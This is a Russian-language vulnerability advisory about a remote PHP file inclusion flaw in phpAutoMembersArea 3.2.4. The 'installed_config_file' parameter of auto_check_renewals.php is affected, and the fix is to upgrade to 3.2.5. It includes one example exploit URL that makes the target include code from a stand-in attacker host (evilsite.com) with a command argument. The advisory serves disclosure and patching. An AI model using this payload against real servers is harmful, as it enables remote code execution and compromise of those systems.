PHP-инклюдинг в phpAutoMembersArea

Дата публикации:
11.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
1126
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpAutoMembersArea 3.x
Уязвимые версии: phpAutoMembersArea 3.2.4, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "installed_config_file" в сценарии auto_check_renewals.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[target]/auto_check_renewals.php?installed_config_file=http://evilsite.com?cmd=ls

URL производителя: www.dwalker.co.uk/phpautomembersarea/

Решение: Установите последнюю версию (3.2.5) с сайта производителя.

Ссылки: phpAutoMembersArea 3.2.5 ($installed_config_file) Remote File Inclusion

или введите имя

CAPTCHA